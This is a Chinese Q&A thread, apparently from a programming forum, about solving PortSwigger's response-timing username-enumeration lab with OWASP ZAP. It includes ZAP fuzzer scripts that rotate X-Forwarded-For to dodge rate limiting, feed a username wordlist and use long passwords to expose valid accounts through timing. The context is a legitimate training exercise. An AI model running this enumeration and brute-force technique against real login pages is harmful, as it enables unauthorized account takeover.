OWASP ZAP 模糊器 header 和 body

Question

我正在学习如何使用 OWASP ZAP，我想知道如何使用相同的负载脚本在请求中同时对 header 和 body 进行模糊测试。我正在尝试做这个实验来练习：

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing

为了模拟 Burp suite pro 的干草叉行为：

ZAP missing payload mode pitchfork

问题是当我必须在同一有效负载中对​​ header 和 body 进行模糊测试时。我收到一个 httpmalformedheaderexpection 并且 fuzzer 没有启动。这就是我正在尝试的：

// Auxiliary variables/constants for payload generation.
var INITIAL_VALUE = 1;
var count = INITIAL_VALUE;
var name = ["carlos","root","admin"];
var NUMBER_OF_PAYLOADS = name.length;

/**
 * Returns the number of generated payloads, zero to indicate unknown number.
 * The number is used as a hint for progress calculations.
 * 
 * @return {number} The number of generated payloads.
 */
function getNumberOfPayloads() {
    return NUMBER_OF_PAYLOADS;
}

/**
 * Returns true if there are still payloads to generate, false otherwise.
 * 
 * Called before each call to next().
 * 
 * @return {boolean} If there are still payloads to generate.
 */
function hasNext() {
    return (count <= NUMBER_OF_PAYLOADS);
}

/**
 * Returns the next generated payload.
 * 
 * This method is called while hasNext() returns true.
 * 
 * @return {string} The next generated payload.
 */
function next() {
    payload = count;
    count++;
    return payload + "\r\n\r\n" + "username=asdf&password=1234567890"; //error, not using the names array yet
}

/**
 * Resets the internal state of the payload generator, as if no calls to
 * hasNext() or next() have been previously made.
 * 
 * Normally called once the method hasNext() returns false and while payloads
 * are still needed.
 */
function reset() {
    count = INITIAL_VALUE;
}

/**
 * Releases any resources used for generation of payloads (for example, a file).
 * 
 * Called once the payload generator is no longer needed.
 */
function close() {
}

Fuzz 位置：

...
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
X-Forwarded-For: FUZZER

生成的有效负载：

1

username=asdf&password=123456789
2

username=asdf&password=123456789
3

username=asdf&password=123456789

有人fix/workaround完成练习吗？提前致谢。

Edit with capture

Answer 1

httpmalformedheaderexpection 意味着模糊器创建的 header 无效并且已被底层网络库拒绝。您将需要确保模糊器生成有效的 headers。我们知道此限制并正在更换所有 ZAP 网络，这将解决此问题。

Answer 2

这是我的建议：对 X-Forwarded-For 有效载荷使用 Numerzz 有效载荷，并使用消息处理器脚本从数组中插入用户名或密码值。

创建一个 Fuzz HTTP 处理器脚本（在下面的说明中它被命名为 timing_1）：

// Auxiliary variables/constants needed for processing.
var count = 1;
var TreeSet = Java.type("java.util.TreeSet");
var HtmlParameter = Java.type("org.parosproxy.paros.network.HtmlParameter");
var longpass = "01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789";

function processMessage(utils, message) {
    // Process fuzzed message...
    var iteration = message.getRequestHeader().getHeader("X-Forwarded-For");
    var formParams = new TreeSet();
    formParams.add(new HtmlParameter(HtmlParameter.Type.form, "username", name[iteration]));
    formParams.add(new HtmlParameter(HtmlParameter.Type.form, "password", longpass));
    message.setFormParams(formParams);
}

function processResult(utils, fuzzResult){
    return true;
}

function getRequiredParamsNames(){
    return [];
}

function getOptionalParamsNames(){
    return [];
}

var name = ["carlos",
"root",
"admin",
"test",
"guest",
"info",
"adm",
"mysql",
"user",
"administrator",
"oracle",
"ftp",
"pi",
"puppet",
"ansible",
"ec2-user",
"vagrant",
"azureuser",
"academico",
"acceso",
"access",
"accounting",
"accounts",
"acid",
"activestat",
"ad",
"adam",
"adkit",
"admin",
"administracion",
"administrador",
"administrator",
"administrators",
"admins",
"ads",
"adserver",
"adsl",
"ae",
"af",
"affiliate",
"affiliates",
"afiliados",
"ag",
"agenda",
"agent",
"ai",
"aix",
"ajax",
"ak",
"akamai",
"al",
"alabama",
"alaska",
"albuquerque",
"alerts",
"alpha",
"alterwind",
"am",
"amarillo",
"americas",
"an",
"anaheim",
"analyzer",
"announce",
"announcements",
"antivirus",
"ao",
"ap",
"apache",
"apollo",
"app",
"app01",
"app1",
"apple",
"application",
"applications",
"apps",
"appserver",
"aq",
"ar",
"archie",
"arcsight",
"argentina",
"arizona",
"arkansas",
"arlington",
"as",
"as400",
"asia",
"asterix",
"at",
"athena",
"atlanta",
"atlas",
"att",
"au",
"auction",
"austin",
"auth",
"auto",
"autodiscover"]

查找与 Peter Wiener 相关的登录 POST

Select 向 Fuzz 发送的消息（右键单击“攻击”>“Fuzz...”）。 编辑消息，添加 X-Forwarded-For header 并将密码设置为长字符串：

Select 您为 X-Forwarded-For 设置的虚拟值，添加一个有效载荷。 （Numberzz - 0 到 100，递增 1）。 [注意：如果你必须 运行 多次，你可能需要调整范围并对你的“迭代器”变量执行一些简单的数学运算，以便通过 X-Forwarded-For 控制并获得正确的数组指数。]

接受负载添加对话框。 转到“消息处理器”选项卡。 删除“Payload Reflection Detector”（这不是绝对必要的，但在这种情况下我们不关心反射，所以也可以。） 添加“timing_1”并将其移至顶部。

按 RTT（往返时间）列对模糊测试结果进行排序：

请注意其中一个花费的时间明显更长（我已经在请求中编辑了用户名）：

既然您已拥有相关用户的用户名，请稍微修改脚本（或创建第二个脚本）以处理密码负载。